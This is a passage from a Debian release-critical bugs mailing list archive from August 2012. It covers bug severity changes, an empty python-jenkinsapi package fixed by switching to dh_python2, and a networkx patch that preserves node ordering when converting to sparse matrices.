with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Bug#684057: openvswitch-switch - Does not start with upstream openvswitch module

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 684057 important
Bug #684057 [openvswitch-switch] openvswitch-switch - Does not start with 
upstream openvswitch module
Severity set to 'important' from 'grave'
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
684057: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684057
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#683992: stale package?

2012-08-06 Thread Neil Wallace
Same error is thrown by a several of the examples provided by the package.

Seems to me that the answer is to package the latest release 1.9.22.
That won't help the wheezy freeze though :(


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#683458: marked as done (python-jenkinsapi: empty package (after rebuild))

2012-08-06 Thread Debian Bug Tracking System
Your message dated Tue, 07 Aug 2012 03:17:53 +
with message-id e1syair-hh...@franck.debian.org
and subject line Bug#683458: fixed in python-jenkinsapi 0.1.11-2
has caused the Debian Bug report #683458,
regarding python-jenkinsapi: empty package (after rebuild)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
683458: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=683458
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---

Source: python-jenkinsapi
Version: 0.1.11-1
Severity: serious

I rebuilt python-jenkinsapi in a minimal unstable chroot. The resulting 
binary package was virtually empty:


$ dpkg -c python-jenkinsapi_0.1.11-1_all.deb | grep -v /$
-rw-r--r-- root/root   156 2012-07-25 01:21 
./usr/share/doc/python-jenkinsapi/changelog.Debian.gz
-rw-r--r-- root/root  3027 2012-07-05 00:35 
./usr/share/doc/python-jenkinsapi/README.rst
-rw-r--r-- root/root  2679 2012-07-25 01:21 
./usr/share/doc/python-jenkinsapi/copyright

The interesting parts of the build log:

|dh_auto_build
| Can't exec pyversions: No such file or directory at 
/usr/share/perl5/Debian/Debhelper/Buildsystem/python_distutils.pm line 120.
| Use of uninitialized value $python_default in substitution (s///) at 
/usr/share/perl5/Debian/Debhelper/Buildsystem/python_distutils.pm line 121.
| Use of uninitialized value $python_default in substitution (s///) at 
/usr/share/perl5/Debian/Debhelper/Buildsystem/python_distutils.pm line 122.
[...]
|dh_auto_install
| Can't exec pyversions: No such file or directory at 
/usr/share/perl5/Debian/Debhelper/Buildsystem/python_distutils.pm line 120.
| Use of uninitialized value $python_default in substitution (s///) at 
/usr/share/perl5/Debian/Debhelper/Buildsystem/python_distutils.pm line 121.
| Use of uninitialized value $python_default in substitution (s///) at 
/usr/share/perl5/Debian/Debhelper/Buildsystem/python_distutils.pm line 122.
[...]
|dh_gencontrol
| dpkg-gencontrol: warning: Depends field of package python-jenkinsapi: unknown 
substitution variable ${python:Depends}
| dpkg-gencontrol: warning: Depends field of package python-jenkinsapi: unknown 
substitution variable ${shlibs:Depends}

--
Jakub Wilk
---End Message---
---BeginMessage---
Source: python-jenkinsapi
Source-Version: 0.1.11-2

We believe that the bug you reported is fixed in the latest version of
python-jenkinsapi, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 683...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Al Stone a...@debian.org (supplier of updated python-jenkinsapi package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Mon, 06 Aug 2012 20:30:56 -0600
Source: python-jenkinsapi
Binary: python-jenkinsapi
Architecture: source amd64
Version: 0.1.11-2
Distribution: unstable
Urgency: low
Maintainer: Al Stone a...@debian.org
Changed-By: Al Stone a...@debian.org
Description: 
 python-jenkinsapi - bindings for Python usage of the Jenkins remote API
Closes: 683458 683460
Changes: 
 python-jenkinsapi (0.1.11-2) unstable; urgency=low
 .
   * Replace usage of python-support with dh_python2
   * Closes: #683458 -- now that dh_python2 is being used, package is
 being built correctly and is no longer empty on rebuild
   * Closes: #683460 -- corrected package dependencies
Checksums-Sha1: 
 bf5b53707a5d1010924081f34da667989a9ef608 1182 python-jenkinsapi_0.1.11-2.dsc
 5468ed6da7adbc1da493c3240aa5dd9c2b256044 2355 
python-jenkinsapi_0.1.11-2.debian.tar.gz
 db098f3e18de7916a8b47ae5cde4990edccad6ab 23534 
python-jenkinsapi_0.1.11-2_amd64.deb
Checksums-Sha256: 
 8b18aa3ae38188ab7723c844640041b9e0df55a2ee4fee08fe9269449067543d 1182 
python-jenkinsapi_0.1.11-2.dsc
 8200f826b43db78111d5a13cc5f927b4b8183185a4ee8fcd85ebb78caefcfdd7 2355 
python-jenkinsapi_0.1.11-2.debian.tar.gz
 688918103de1d2dde60b308daf0a3ec02e1c2f9820df2977617750049050d6fc 23534 
python-jenkinsapi_0.1.11-2_amd64.deb
Files: 
 85b0a93082f58669698f992812f05d17 1182 python optional 
python-jenkinsapi_0.1.11-2.dsc
 a12a79de1188bf78ebf6aabc86bfdfa9 2355 python optional 
python-jenkinsapi_0.1.11-2.debian.tar.gz
 742fae6050da2be3092cb346d59f5e3d 23534 python 

Bug#681581: Bug#684107: Acknowledgement (package final release 1.7)

2012-08-06 Thread Yaroslav Halchenko
my reference to

,---
| e.g. I was just suggested that the fix for
| https://networkx.lanl.gov/trac/ticket/737
| which was fixed right before 1.7 release might be the one causing hard to
| reproduce (stopped failing for me again) FTBFS of nipype:
| http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=681581
`---

unfortunately wasn't a good once since that particular commit was already
present in Debian package:
http://patch-tracker.debian.org/patch/series/view/python-networkx/1.7~rc1-2/changeset_8960521b5ae4897bdbac4ff49525d8b37bff88d2.diff
but it seems that nipype doesn't experience the issue with 1.7 release (now at
run 50 while before it was either crashing or stalling well before run 20)


-- 
Yaroslav O. Halchenko
Postdoctoral Fellow,   Department of Psychological and Brain Sciences
Dartmouth College, 419 Moore Hall, Hinman Box 6207, Hanover, NH 03755
Phone: +1 (603) 646-9834   Fax: +1 (603) 646-1419
WWW:   http://www.linkedin.com/in/yarik


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#681581: Bug#684107: Acknowledgement (package final release 1.7)

2012-08-06 Thread Yaroslav Halchenko
and here we go -- was my mistake of mixing up two patch sets.  If upload
of 1.7 official release to wheezy is impossible, please include the
commit 9ebe087b8bbcdeee3051e07cacd05fa07436c16e (attached, thanks Satra
once again for pointing it out) which resolves the FTBFS of
nipype.

Best regards,
 unfortunately wasn't a good once since that particular commit was already
 present in Debian package:
 http://patch-tracker.debian.org/patch/series/view/python-networkx/1.7~rc1-2/changeset_8960521b5ae4897bdbac4ff49525d8b37bff88d2.diff
 but it seems that nipype doesn't experience the issue with 1.7 release (now at
 run 50 while before it was either crashing or stalling well before run 20)
-- 
Yaroslav O. Halchenko
Postdoctoral Fellow,   Department of Psychological and Brain Sciences
Dartmouth College, 419 Moore Hall, Hinman Box 6207, Hanover, NH 03755
Phone: +1 (603) 646-9834   Fax: +1 (603) 646-1419
WWW:   http://www.linkedin.com/in/yarik
From 9ebe087b8bbcdeee3051e07cacd05fa07436c16e Mon Sep 17 00:00:00 2001
From: Aric Hagberg aric.hagb...@gmail.com
Date: Fri, 29 Jun 2012 21:30:38 -0600
Subject: [PATCH] Preserver order in G.nodes() or given in nodelist when
 converting to scipy sparse matrix.  Update docs to reflect
 use of COO matrix. Addresses #737

---
 networkx/convert.py  |8 +---
 networkx/tests/test_convert_scipy.py |8 
 2 files changed, 13 insertions(+), 3 deletions(-)

diff --git a/networkx/convert.py b/networkx/convert.py
index 833c754..6333b9f 100644
--- a/networkx/convert.py
+++ b/networkx/convert.py
@@ -745,7 +745,7 @@ def to_scipy_sparse_matrix(G, nodelist=None, dtype=None,
 When `nodelist` does not contain every node in `G`, the matrix is built
 from the subgraph of `G` that is induced by the nodes in `nodelist`.
 
-Uses lil_matrix format. To convert to other formats specify the
+Uses coo_matrix format. To convert to other formats specify the
 format= keyword.
 
 Examples
@@ -777,10 +777,12 @@ def to_scipy_sparse_matrix(G, nodelist=None, dtype=None,
 nlen = len(nodelist)
 if nlen == 0:
 raise nx.NetworkXError(Graph has no nodes or edges)
-index = dict(zip(set(nodelist),range(nlen)))
-if len(nodelist) != len(index):
+
+if len(nodelist) != len(set(nodelist)):
 msg = Ambiguous ordering: `nodelist` contained duplicates.
 raise nx.NetworkXError(msg)
+
+index = dict(zip(nodelist,range(nlen)))
 if G.number_of_edges() == 0:
 row,col,data=[],[],[]
 else:
diff --git a/networkx/tests/test_convert_scipy.py b/networkx/tests/test_convert_scipy.py
index 27ab786..f90dee7 100644
--- a/networkx/tests/test_convert_scipy.py
+++ b/networkx/tests/test_convert_scipy.py
@@ -169,3 +169,11 @@ class TestConvertNumpy(object):
 G.add_node(1)
 M = nx.to_scipy_sparse_matrix(G)
 np_assert_equal(M.todense(), np.matrix([[0]]))
+
+def test_ordering(self):
+G = nx.DiGraph()
+G.add_edge(1,2)
+G.add_edge(2,3)
+G.add_edge(3,1)
+M = nx.to_scipy_sparse_matrix(G,nodelist=[3,2,1])
+np_assert_equal(M.todense(), np.matrix([[0,0,1],[1,0,0],[0,1,0]]))
-- 
1.7.10.4



signature.asc
Description: Digital signature